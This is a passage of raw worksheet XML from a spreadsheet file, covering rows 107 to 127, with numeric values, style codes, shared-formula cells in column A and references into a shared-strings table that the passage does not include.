      <c r="N107" s="17"/>
      <c r="O107" s="4" t="s">
        <v>408</v>
      </c>
      <c r="P107" s="4" t="s">
        <v>409</v>
      </c>
      <c r="Q107" s="6">
        <v>1.4905647E7</v>
      </c>
      <c r="R107" s="7"/>
      <c r="S107" s="6">
        <v>1.4905647E7</v>
      </c>
      <c r="T107" s="7"/>
      <c r="U107" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V107" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W107" s="2" t="s">
        <v>410</v>
      </c>
      <c r="X107" s="6">
        <v>1.0</v>
      </c>
      <c r="Y107" s="6">
        <v>5.0</v>
      </c>
      <c r="Z107" s="7"/>
      <c r="AA107" s="7"/>
      <c r="AB107" s="7"/>
      <c r="AC107" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE107" s="8"/>
      <c r="AF107" s="15"/>
    </row>
    <row r="108">
      <c r="A108" s="6">
        <f t="shared" si="1"/>
        <v>0.8474026459</v>
      </c>
      <c r="B108" s="6">
        <v>6.6124686E7</v>
      </c>
      <c r="C108" s="6">
        <v>1.0</v>
      </c>
      <c r="D108" s="8"/>
      <c r="E108" s="8"/>
      <c r="F108" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G108" s="8"/>
      <c r="H108" s="6">
        <v>0.0</v>
      </c>
      <c r="I108" s="6">
        <v>369.0</v>
      </c>
      <c r="J108" s="20"/>
      <c r="K108" s="20"/>
      <c r="L108" s="20"/>
      <c r="M108" s="20"/>
      <c r="N108" s="20"/>
      <c r="O108" s="4" t="s">
        <v>411</v>
      </c>
      <c r="P108" s="4" t="s">
        <v>412</v>
      </c>
      <c r="Q108" s="6">
        <v>1.2895147E7</v>
      </c>
      <c r="R108" s="8"/>
      <c r="S108" s="8"/>
      <c r="T108" s="8"/>
      <c r="U108" s="8"/>
      <c r="V108" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W108" s="2" t="s">
        <v>413</v>
      </c>
      <c r="X108" s="6">
        <v>2.0</v>
      </c>
      <c r="Y108" s="6">
        <v>0.0</v>
      </c>
      <c r="Z108" s="6">
        <v>0.0</v>
      </c>
      <c r="AA108" s="8"/>
      <c r="AB108" s="8"/>
      <c r="AC108" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE108" s="8"/>
      <c r="AF108" s="14"/>
    </row>
    <row r="109">
      <c r="A109" s="6">
        <f t="shared" si="1"/>
        <v>0.988949835</v>
      </c>
      <c r="B109" s="6">
        <v>4.2553116E7</v>
      </c>
      <c r="C109" s="6">
        <v>1.0</v>
      </c>
      <c r="D109" s="6">
        <v>4.3772505E7</v>
      </c>
      <c r="E109" s="8"/>
      <c r="F109" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G109" s="8"/>
      <c r="H109" s="6">
        <v>0.0</v>
      </c>
      <c r="I109" s="6">
        <v>157.0</v>
      </c>
      <c r="J109" s="17"/>
      <c r="K109" s="17"/>
      <c r="L109" s="17"/>
      <c r="M109" s="17"/>
      <c r="N109" s="17"/>
      <c r="O109" s="4" t="s">
        <v>414</v>
      </c>
      <c r="P109" s="4" t="s">
        <v>415</v>
      </c>
      <c r="Q109" s="6">
        <v>1827295.0</v>
      </c>
      <c r="R109" s="7"/>
      <c r="S109" s="6">
        <v>3251516.0</v>
      </c>
      <c r="T109" s="7"/>
      <c r="U109" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V109" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W109" s="2" t="s">
        <v>416</v>
      </c>
      <c r="X109" s="6">
        <v>1.0</v>
      </c>
      <c r="Y109" s="6">
        <v>0.0</v>
      </c>
      <c r="Z109" s="6">
        <v>0.0</v>
      </c>
      <c r="AA109" s="7"/>
      <c r="AB109" s="7"/>
      <c r="AC109" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE109" s="8"/>
      <c r="AF109" s="15"/>
    </row>
    <row r="110">
      <c r="A110" s="6">
        <f t="shared" si="1"/>
        <v>0.7093436724</v>
      </c>
      <c r="B110" s="6">
        <v>4246488.0</v>
      </c>
      <c r="C110" s="6">
        <v>1.0</v>
      </c>
      <c r="D110" s="6">
        <v>4391936.0</v>
      </c>
      <c r="E110" s="8"/>
      <c r="F110" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G110" s="8"/>
      <c r="H110" s="6">
        <v>1.0</v>
      </c>
      <c r="I110" s="6">
        <v>1679.0</v>
      </c>
      <c r="J110" s="17"/>
      <c r="K110" s="17"/>
      <c r="L110" s="17"/>
      <c r="M110" s="17"/>
      <c r="N110" s="17"/>
      <c r="O110" s="4" t="s">
        <v>417</v>
      </c>
      <c r="P110" s="4" t="s">
        <v>418</v>
      </c>
      <c r="Q110" s="6">
        <v>65040.0</v>
      </c>
      <c r="R110" s="7"/>
      <c r="S110" s="7"/>
      <c r="T110" s="7"/>
      <c r="U110" s="8"/>
      <c r="V110" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W110" s="2" t="s">
        <v>419</v>
      </c>
      <c r="X110" s="6">
        <v>3.0</v>
      </c>
      <c r="Y110" s="6">
        <v>0.0</v>
      </c>
      <c r="Z110" s="6">
        <v>0.0</v>
      </c>
      <c r="AA110" s="7"/>
      <c r="AB110" s="7"/>
      <c r="AC110" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE110" s="8"/>
      <c r="AF110" s="15"/>
    </row>
    <row r="111">
      <c r="A111" s="6">
        <f t="shared" si="1"/>
        <v>0.113720216</v>
      </c>
      <c r="B111" s="6">
        <v>6.9627815E7</v>
      </c>
      <c r="C111" s="6">
        <v>1.0</v>
      </c>
      <c r="D111" s="8"/>
      <c r="E111" s="8"/>
      <c r="F111" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G111" s="8"/>
      <c r="H111" s="6">
        <v>1.0</v>
      </c>
      <c r="I111" s="6">
        <v>169.0</v>
      </c>
      <c r="J111" s="20"/>
      <c r="K111" s="20"/>
      <c r="L111" s="20"/>
      <c r="M111" s="20"/>
      <c r="N111" s="20"/>
      <c r="O111" s="4" t="s">
        <v>420</v>
      </c>
      <c r="P111" s="4" t="s">
        <v>421</v>
      </c>
      <c r="Q111" s="6">
        <v>1.5446887E7</v>
      </c>
      <c r="R111" s="8"/>
      <c r="S111" s="8"/>
      <c r="T111" s="8"/>
      <c r="U111" s="8"/>
      <c r="V111" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W111" s="2" t="s">
        <v>422</v>
      </c>
      <c r="X111" s="6">
        <v>0.0</v>
      </c>
      <c r="Y111" s="6">
        <v>3.0</v>
      </c>
      <c r="Z111" s="8"/>
      <c r="AA111" s="8"/>
      <c r="AB111" s="8"/>
      <c r="AC111" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE111" s="8"/>
      <c r="AF111" s="14"/>
    </row>
    <row r="112">
      <c r="A112" s="6">
        <f t="shared" si="1"/>
        <v>0.160674639</v>
      </c>
      <c r="B112" s="6">
        <v>2.8880863E7</v>
      </c>
      <c r="C112" s="6">
        <v>1.0</v>
      </c>
      <c r="D112" s="7"/>
      <c r="E112" s="8"/>
      <c r="F112" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G112" s="8"/>
      <c r="H112" s="6">
        <v>0.0</v>
      </c>
      <c r="I112" s="6">
        <v>3209.0</v>
      </c>
      <c r="J112" s="17"/>
      <c r="K112" s="17"/>
      <c r="L112" s="17"/>
      <c r="M112" s="17"/>
      <c r="N112" s="17"/>
      <c r="O112" s="4" t="s">
        <v>423</v>
      </c>
      <c r="P112" s="4" t="s">
        <v>424</v>
      </c>
      <c r="Q112" s="6">
        <v>4636898.0</v>
      </c>
      <c r="R112" s="7"/>
      <c r="S112" s="6">
        <v>4636898.0</v>
      </c>
      <c r="T112" s="7"/>
      <c r="U112" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V112" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W112" s="2" t="s">
        <v>425</v>
      </c>
      <c r="X112" s="6">
        <v>2.0</v>
      </c>
      <c r="Y112" s="6">
        <v>0.0</v>
      </c>
      <c r="Z112" s="7"/>
      <c r="AA112" s="7"/>
      <c r="AB112" s="7"/>
      <c r="AC112" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE112" s="8"/>
      <c r="AF112" s="15"/>
    </row>
    <row r="113">
      <c r="A113" s="6">
        <f t="shared" si="1"/>
        <v>0.452453275</v>
      </c>
      <c r="B113" s="6">
        <v>6.8835636E7</v>
      </c>
      <c r="C113" s="6">
        <v>1.0</v>
      </c>
      <c r="D113" s="6">
        <v>6.883662E7</v>
      </c>
      <c r="E113" s="8"/>
      <c r="F113" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G113" s="8"/>
      <c r="H113" s="6">
        <v>0.0</v>
      </c>
      <c r="I113" s="6">
        <v>53.0</v>
      </c>
      <c r="J113" s="17"/>
      <c r="K113" s="17"/>
      <c r="L113" s="17"/>
      <c r="M113" s="17"/>
      <c r="N113" s="17"/>
      <c r="O113" s="4" t="s">
        <v>426</v>
      </c>
      <c r="P113" s="4" t="s">
        <v>427</v>
      </c>
      <c r="Q113" s="6">
        <v>1.6617538E7</v>
      </c>
      <c r="R113" s="7"/>
      <c r="S113" s="6">
        <v>1839439.0</v>
      </c>
      <c r="T113" s="7"/>
      <c r="U113" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V113" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W113" s="2" t="s">
        <v>428</v>
      </c>
      <c r="X113" s="6">
        <v>1.0</v>
      </c>
      <c r="Y113" s="6">
        <v>2.0</v>
      </c>
      <c r="Z113" s="7"/>
      <c r="AA113" s="7"/>
      <c r="AB113" s="7"/>
      <c r="AC113" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE113" s="8"/>
      <c r="AF113" s="15"/>
    </row>
    <row r="114">
      <c r="A114" s="6">
        <f t="shared" si="1"/>
        <v>0.1623602492</v>
      </c>
      <c r="B114" s="6">
        <v>4228106.0</v>
      </c>
      <c r="C114" s="6">
        <v>1.0</v>
      </c>
      <c r="D114" s="6">
        <v>4229937.0</v>
      </c>
      <c r="E114" s="8"/>
      <c r="F114" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G114" s="8"/>
      <c r="H114" s="6">
        <v>0.0</v>
      </c>
      <c r="I114" s="6">
        <v>2297.0</v>
      </c>
      <c r="J114" s="17"/>
      <c r="K114" s="17"/>
      <c r="L114" s="17"/>
      <c r="M114" s="17"/>
      <c r="N114" s="17"/>
      <c r="O114" s="4" t="s">
        <v>429</v>
      </c>
      <c r="P114" s="4" t="s">
        <v>430</v>
      </c>
      <c r="Q114" s="6">
        <v>235267.0</v>
      </c>
      <c r="R114" s="7"/>
      <c r="S114" s="7"/>
      <c r="T114" s="7"/>
      <c r="U114" s="8"/>
      <c r="V114" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W114" s="2" t="s">
        <v>431</v>
      </c>
      <c r="X114" s="6">
        <v>3.0</v>
      </c>
      <c r="Y114" s="6">
        <v>0.0</v>
      </c>
      <c r="Z114" s="7"/>
      <c r="AA114" s="7"/>
      <c r="AB114" s="7"/>
      <c r="AC114" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE114" s="8"/>
      <c r="AF114" s="15"/>
    </row>
    <row r="115">
      <c r="A115" s="6">
        <f t="shared" si="1"/>
        <v>0.08226036954</v>
      </c>
      <c r="B115" s="6">
        <v>6.7456173E7</v>
      </c>
      <c r="C115" s="6">
        <v>1.0</v>
      </c>
      <c r="D115" s="8"/>
      <c r="E115" s="8"/>
      <c r="F115" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G115" s="8"/>
      <c r="H115" s="6">
        <v>0.0</v>
      </c>
      <c r="I115" s="6">
        <v>141.0</v>
      </c>
      <c r="J115" s="20"/>
      <c r="K115" s="20"/>
      <c r="L115" s="20"/>
      <c r="M115" s="20"/>
      <c r="N115" s="20"/>
      <c r="O115" s="4" t="s">
        <v>432</v>
      </c>
      <c r="P115" s="4" t="s">
        <v>433</v>
      </c>
      <c r="Q115" s="6">
        <v>1.5760901E7</v>
      </c>
      <c r="R115" s="8"/>
      <c r="S115" s="6">
        <v>1.5760901E7</v>
      </c>
      <c r="T115" s="8"/>
      <c r="U115" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V115" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W115" s="2" t="s">
        <v>434</v>
      </c>
      <c r="X115" s="6">
        <v>1.0</v>
      </c>
      <c r="Y115" s="6">
        <v>2.0</v>
      </c>
      <c r="Z115" s="8"/>
      <c r="AA115" s="8"/>
      <c r="AB115" s="8"/>
      <c r="AC115" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE115" s="8"/>
      <c r="AF115" s="14"/>
    </row>
    <row r="116">
      <c r="A116" s="6">
        <f t="shared" si="1"/>
        <v>0.977958073</v>
      </c>
      <c r="B116" s="6">
        <v>7.6569895E7</v>
      </c>
      <c r="C116" s="6">
        <v>1.0</v>
      </c>
      <c r="D116" s="7"/>
      <c r="E116" s="8"/>
      <c r="F116" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G116" s="8"/>
      <c r="H116" s="6">
        <v>0.0</v>
      </c>
      <c r="I116" s="6">
        <v>12.0</v>
      </c>
      <c r="J116" s="17"/>
      <c r="K116" s="17"/>
      <c r="L116" s="17"/>
      <c r="M116" s="17"/>
      <c r="N116" s="17"/>
      <c r="O116" s="4" t="s">
        <v>435</v>
      </c>
      <c r="P116" s="4" t="s">
        <v>436</v>
      </c>
      <c r="Q116" s="6">
        <v>2.214272E7</v>
      </c>
      <c r="R116" s="7"/>
      <c r="S116" s="7"/>
      <c r="T116" s="7"/>
      <c r="U116" s="8"/>
      <c r="V116" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W116" s="2" t="s">
        <v>437</v>
      </c>
      <c r="X116" s="6">
        <v>0.0</v>
      </c>
      <c r="Y116" s="6">
        <v>0.0</v>
      </c>
      <c r="Z116" s="7"/>
      <c r="AA116" s="7"/>
      <c r="AB116" s="7"/>
      <c r="AC116" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE116" s="8"/>
      <c r="AF116" s="15"/>
    </row>
    <row r="117">
      <c r="A117" s="6">
        <f t="shared" si="1"/>
        <v>0.5881445528</v>
      </c>
      <c r="B117" s="6">
        <v>3012317.0</v>
      </c>
      <c r="C117" s="6">
        <v>1.0</v>
      </c>
      <c r="D117" s="6">
        <v>3012345.0</v>
      </c>
      <c r="E117" s="8"/>
      <c r="F117" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G117" s="8"/>
      <c r="H117" s="6">
        <v>6.0</v>
      </c>
      <c r="I117" s="6">
        <v>2060.0</v>
      </c>
      <c r="J117" s="20"/>
      <c r="K117" s="20"/>
      <c r="L117" s="20"/>
      <c r="M117" s="20"/>
      <c r="N117" s="20"/>
      <c r="O117" s="4" t="s">
        <v>438</v>
      </c>
      <c r="P117" s="4" t="s">
        <v>439</v>
      </c>
      <c r="Q117" s="6">
        <v>225669.0</v>
      </c>
      <c r="R117" s="8"/>
      <c r="S117" s="8"/>
      <c r="T117" s="8"/>
      <c r="U117" s="8"/>
      <c r="V117" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W117" s="2" t="s">
        <v>299</v>
      </c>
      <c r="X117" s="6">
        <v>4.0</v>
      </c>
      <c r="Y117" s="6">
        <v>0.0</v>
      </c>
      <c r="Z117" s="8"/>
      <c r="AA117" s="8"/>
      <c r="AB117" s="8"/>
      <c r="AC117" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE117" s="8"/>
      <c r="AF117" s="14"/>
    </row>
    <row r="118">
      <c r="A118" s="6">
        <f t="shared" si="1"/>
        <v>0.6322601178</v>
      </c>
      <c r="B118" s="6">
        <v>5.6344316E7</v>
      </c>
      <c r="C118" s="6">
        <v>1.0</v>
      </c>
      <c r="D118" s="6">
        <v>5.6543505E7</v>
      </c>
      <c r="E118" s="8"/>
      <c r="F118" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G118" s="8"/>
      <c r="H118" s="6">
        <v>0.0</v>
      </c>
      <c r="I118" s="6">
        <v>487.0</v>
      </c>
      <c r="J118" s="20"/>
      <c r="K118" s="20"/>
      <c r="L118" s="20"/>
      <c r="M118" s="20"/>
      <c r="N118" s="20"/>
      <c r="O118" s="4" t="s">
        <v>440</v>
      </c>
      <c r="P118" s="4" t="s">
        <v>441</v>
      </c>
      <c r="Q118" s="6">
        <v>7220863.0</v>
      </c>
      <c r="R118" s="8"/>
      <c r="S118" s="8"/>
      <c r="T118" s="8"/>
      <c r="U118" s="8"/>
      <c r="V118" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W118" s="2" t="s">
        <v>442</v>
      </c>
      <c r="X118" s="6">
        <v>1.0</v>
      </c>
      <c r="Y118" s="6">
        <v>0.0</v>
      </c>
      <c r="Z118" s="6">
        <v>0.0</v>
      </c>
      <c r="AA118" s="8"/>
      <c r="AB118" s="8"/>
      <c r="AC118" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE118" s="8"/>
      <c r="AF118" s="14"/>
    </row>
    <row r="119">
      <c r="A119" s="6">
        <f t="shared" si="1"/>
        <v>0.8175654081</v>
      </c>
      <c r="B119" s="6">
        <v>3.9031548E7</v>
      </c>
      <c r="C119" s="6">
        <v>1.0</v>
      </c>
      <c r="D119" s="7"/>
      <c r="E119" s="8"/>
      <c r="F119" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G119" s="8"/>
      <c r="H119" s="6">
        <v>0.0</v>
      </c>
      <c r="I119" s="6">
        <v>435.0</v>
      </c>
      <c r="J119" s="17"/>
      <c r="K119" s="17"/>
      <c r="L119" s="17"/>
      <c r="M119" s="17"/>
      <c r="N119" s="17"/>
      <c r="O119" s="4" t="s">
        <v>443</v>
      </c>
      <c r="P119" s="4" t="s">
        <v>444</v>
      </c>
      <c r="Q119" s="6">
        <v>6126017.0</v>
      </c>
      <c r="R119" s="7"/>
      <c r="S119" s="7"/>
      <c r="T119" s="7"/>
      <c r="U119" s="8"/>
      <c r="V119" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W119" s="2" t="s">
        <v>445</v>
      </c>
      <c r="X119" s="6">
        <v>3.0</v>
      </c>
      <c r="Y119" s="6">
        <v>0.0</v>
      </c>
      <c r="Z119" s="7"/>
      <c r="AA119" s="7"/>
      <c r="AB119" s="7"/>
      <c r="AC119" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE119" s="8"/>
      <c r="AF119" s="15"/>
    </row>
    <row r="120">
      <c r="A120" s="6">
        <f t="shared" si="1"/>
        <v>0.6605891659</v>
      </c>
      <c r="B120" s="6">
        <v>2.4632427E7</v>
      </c>
      <c r="C120" s="6">
        <v>1.0</v>
      </c>
      <c r="D120" s="8"/>
      <c r="E120" s="8"/>
      <c r="F120" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G120" s="8"/>
      <c r="H120" s="6">
        <v>0.0</v>
      </c>
      <c r="I120" s="6">
        <v>314.0</v>
      </c>
      <c r="J120" s="20"/>
      <c r="K120" s="20"/>
      <c r="L120" s="20"/>
      <c r="M120" s="20"/>
      <c r="N120" s="20"/>
      <c r="O120" s="4" t="s">
        <v>446</v>
      </c>
      <c r="P120" s="4" t="s">
        <v>447</v>
      </c>
      <c r="Q120" s="6">
        <v>3816412.0</v>
      </c>
      <c r="R120" s="8"/>
      <c r="S120" s="6">
        <v>934239.0</v>
      </c>
      <c r="T120" s="8"/>
      <c r="U120" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V120" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W120" s="2" t="s">
        <v>448</v>
      </c>
      <c r="X120" s="6">
        <v>0.0</v>
      </c>
      <c r="Y120" s="6">
        <v>9.0</v>
      </c>
      <c r="Z120" s="8"/>
      <c r="AA120" s="8"/>
      <c r="AB120" s="8"/>
      <c r="AC120" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE120" s="8"/>
      <c r="AF120" s="14"/>
    </row>
    <row r="121">
      <c r="A121" s="6">
        <f t="shared" si="1"/>
        <v>0.3234605869</v>
      </c>
      <c r="B121" s="6">
        <v>6.9612885E7</v>
      </c>
      <c r="C121" s="6">
        <v>1.0</v>
      </c>
      <c r="D121" s="8"/>
      <c r="E121" s="8"/>
      <c r="F121" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G121" s="8"/>
      <c r="H121" s="6">
        <v>0.0</v>
      </c>
      <c r="I121" s="6">
        <v>176.0</v>
      </c>
      <c r="J121" s="20"/>
      <c r="K121" s="20"/>
      <c r="L121" s="20"/>
      <c r="M121" s="20"/>
      <c r="N121" s="20"/>
      <c r="O121" s="4" t="s">
        <v>449</v>
      </c>
      <c r="P121" s="4" t="s">
        <v>450</v>
      </c>
      <c r="Q121" s="6">
        <v>1.6186302E7</v>
      </c>
      <c r="R121" s="8"/>
      <c r="S121" s="6">
        <v>3486184.0</v>
      </c>
      <c r="T121" s="8"/>
      <c r="U121" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V121" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W121" s="2" t="s">
        <v>451</v>
      </c>
      <c r="X121" s="6">
        <v>0.0</v>
      </c>
      <c r="Y121" s="6">
        <v>2.0</v>
      </c>
      <c r="Z121" s="8"/>
      <c r="AA121" s="8"/>
      <c r="AB121" s="8"/>
      <c r="AC121" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE121" s="8"/>
      <c r="AF121" s="14"/>
    </row>
    <row r="122">
      <c r="A122" s="6">
        <f t="shared" si="1"/>
        <v>0.4388691206</v>
      </c>
      <c r="B122" s="6">
        <v>6.9127244E7</v>
      </c>
      <c r="C122" s="6">
        <v>1.0</v>
      </c>
      <c r="D122" s="7"/>
      <c r="E122" s="8"/>
      <c r="F122" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G122" s="8"/>
      <c r="H122" s="6">
        <v>5.0</v>
      </c>
      <c r="I122" s="6">
        <v>183.0</v>
      </c>
      <c r="J122" s="17"/>
      <c r="K122" s="17"/>
      <c r="L122" s="17"/>
      <c r="M122" s="17"/>
      <c r="N122" s="17"/>
      <c r="O122" s="4" t="s">
        <v>452</v>
      </c>
      <c r="P122" s="4" t="s">
        <v>453</v>
      </c>
      <c r="Q122" s="6">
        <v>461640.0</v>
      </c>
      <c r="R122" s="7"/>
      <c r="S122" s="7"/>
      <c r="T122" s="7"/>
      <c r="U122" s="8"/>
      <c r="V122" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W122" s="2" t="s">
        <v>454</v>
      </c>
      <c r="X122" s="6">
        <v>1.0</v>
      </c>
      <c r="Y122" s="6">
        <v>0.0</v>
      </c>
      <c r="Z122" s="6">
        <v>0.0</v>
      </c>
      <c r="AA122" s="7"/>
      <c r="AB122" s="7"/>
      <c r="AC122" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE122" s="8"/>
      <c r="AF122" s="15"/>
    </row>
    <row r="123">
      <c r="A123" s="6">
        <f t="shared" si="1"/>
        <v>0.1639504864</v>
      </c>
      <c r="B123" s="6">
        <v>6.9458715E7</v>
      </c>
      <c r="C123" s="6">
        <v>1.0</v>
      </c>
      <c r="D123" s="6">
        <v>6.9458757E7</v>
      </c>
      <c r="E123" s="8"/>
      <c r="F123" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G123" s="8"/>
      <c r="H123" s="6">
        <v>1.0</v>
      </c>
      <c r="I123" s="6">
        <v>1080.0</v>
      </c>
      <c r="J123" s="20"/>
      <c r="K123" s="20"/>
      <c r="L123" s="20"/>
      <c r="M123" s="20"/>
      <c r="N123" s="20"/>
      <c r="O123" s="4" t="s">
        <v>455</v>
      </c>
      <c r="P123" s="4" t="s">
        <v>456</v>
      </c>
      <c r="Q123" s="6">
        <v>1.7084841E7</v>
      </c>
      <c r="R123" s="8"/>
      <c r="S123" s="8"/>
      <c r="T123" s="8"/>
      <c r="U123" s="8"/>
      <c r="V123" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W123" s="2" t="s">
        <v>457</v>
      </c>
      <c r="X123" s="6">
        <v>2.0</v>
      </c>
      <c r="Y123" s="6">
        <v>3.0</v>
      </c>
      <c r="Z123" s="8"/>
      <c r="AA123" s="8"/>
      <c r="AB123" s="8"/>
      <c r="AC123" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE123" s="8"/>
      <c r="AF123" s="14"/>
    </row>
    <row r="124">
      <c r="A124" s="6">
        <f t="shared" si="1"/>
        <v>0.4180400522</v>
      </c>
      <c r="B124" s="6">
        <v>3.1397897E7</v>
      </c>
      <c r="C124" s="6">
        <v>1.0</v>
      </c>
      <c r="D124" s="6">
        <v>3.139793E7</v>
      </c>
      <c r="E124" s="8"/>
      <c r="F124" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G124" s="8"/>
      <c r="H124" s="6">
        <v>1.0</v>
      </c>
      <c r="I124" s="6">
        <v>134.0</v>
      </c>
      <c r="J124" s="20"/>
      <c r="K124" s="20"/>
      <c r="L124" s="20"/>
      <c r="M124" s="20"/>
      <c r="N124" s="20"/>
      <c r="O124" s="4" t="s">
        <v>458</v>
      </c>
      <c r="P124" s="4" t="s">
        <v>459</v>
      </c>
      <c r="Q124" s="6">
        <v>5113313.0</v>
      </c>
      <c r="R124" s="8"/>
      <c r="S124" s="8"/>
      <c r="T124" s="8"/>
      <c r="U124" s="8"/>
      <c r="V124" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W124" s="2" t="s">
        <v>460</v>
      </c>
      <c r="X124" s="6">
        <v>1.0</v>
      </c>
      <c r="Y124" s="6">
        <v>0.0</v>
      </c>
      <c r="Z124" s="8"/>
      <c r="AA124" s="8"/>
      <c r="AB124" s="8"/>
      <c r="AC124" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE124" s="8"/>
      <c r="AF124" s="14"/>
    </row>
    <row r="125">
      <c r="A125" s="6">
        <f t="shared" si="1"/>
        <v>0.8740815365</v>
      </c>
      <c r="B125" s="6">
        <v>3.596918E7</v>
      </c>
      <c r="C125" s="6">
        <v>1.0</v>
      </c>
      <c r="D125" s="8"/>
      <c r="E125" s="8"/>
      <c r="F125" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G125" s="8"/>
      <c r="H125" s="6">
        <v>0.0</v>
      </c>
      <c r="I125" s="6">
        <v>236.0</v>
      </c>
      <c r="J125" s="20"/>
      <c r="K125" s="20"/>
      <c r="L125" s="20"/>
      <c r="M125" s="20"/>
      <c r="N125" s="20"/>
      <c r="O125" s="4" t="s">
        <v>461</v>
      </c>
      <c r="P125" s="4" t="s">
        <v>462</v>
      </c>
      <c r="Q125" s="6">
        <v>1916171.0</v>
      </c>
      <c r="R125" s="8"/>
      <c r="S125" s="8"/>
      <c r="T125" s="8"/>
      <c r="U125" s="8"/>
      <c r="V125" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W125" s="2" t="s">
        <v>463</v>
      </c>
      <c r="X125" s="6">
        <v>1.0</v>
      </c>
      <c r="Y125" s="6">
        <v>1.0</v>
      </c>
      <c r="Z125" s="8"/>
      <c r="AA125" s="8"/>
      <c r="AB125" s="8"/>
      <c r="AC125" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE125" s="8"/>
      <c r="AF125" s="14"/>
    </row>
    <row r="126">
      <c r="A126" s="6">
        <f t="shared" si="1"/>
        <v>0.685329961</v>
      </c>
      <c r="B126" s="6">
        <v>6.2931464E7</v>
      </c>
      <c r="C126" s="6">
        <v>1.0</v>
      </c>
      <c r="D126" s="8"/>
      <c r="E126" s="8"/>
      <c r="F126" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G126" s="8"/>
      <c r="H126" s="6">
        <v>0.0</v>
      </c>
      <c r="I126" s="6">
        <v>5824.0</v>
      </c>
      <c r="J126" s="20"/>
      <c r="K126" s="20"/>
      <c r="L126" s="20"/>
      <c r="M126" s="20"/>
      <c r="N126" s="20"/>
      <c r="O126" s="4" t="s">
        <v>464</v>
      </c>
      <c r="P126" s="4" t="s">
        <v>465</v>
      </c>
      <c r="Q126" s="6">
        <v>1.2323979E7</v>
      </c>
      <c r="R126" s="8"/>
      <c r="S126" s="6">
        <v>1839439.0</v>
      </c>
      <c r="T126" s="8"/>
      <c r="U126" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V126" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W126" s="2" t="s">
        <v>466</v>
      </c>
      <c r="X126" s="6">
        <v>3.0</v>
      </c>
      <c r="Y126" s="6">
        <v>0.0</v>
      </c>
      <c r="Z126" s="6">
        <v>0.0</v>
      </c>
      <c r="AA126" s="8"/>
      <c r="AB126" s="8"/>
      <c r="AC126" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE126" s="8"/>
      <c r="AF126" s="14"/>
    </row>
    <row r="127">
      <c r="A127" s="6">
        <f t="shared" si="1"/>
        <v>0.104868783</v>
      </c>
      <c r="B127" s="6">
        <v>3.6444172E7</v>
      </c>
      <c r="C127" s="6">
        <v>1.0</v>
      </c>
      <c r="D127" s="8"/>
      <c r="E127" s="8"/>
      <c r="F127" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G127" s="8"/>
      <c r="H127" s="6">
        <v>12.0</v>
      </c>
      <c r="I127" s="6">
        <v>3778.0</v>
      </c>
      <c r="J127" s="20"/>
      <c r="K127" s="20"/>
      <c r="L127" s="20"/>
      <c r="M127" s="20"/>
      <c r="N127" s="20"/>
      <c r="O127" s="4" t="s">
        <v>467</v>
      </c>
      <c r="P127" s="4" t="s">
        <v>468</v>
      </c>
      <c r="Q127" s="6">
        <v>4617571.0</v>
      </c>
      <c r="R127" s="8"/>
      <c r="S127" s="6">
        <v>4617571.0</v>
      </c>
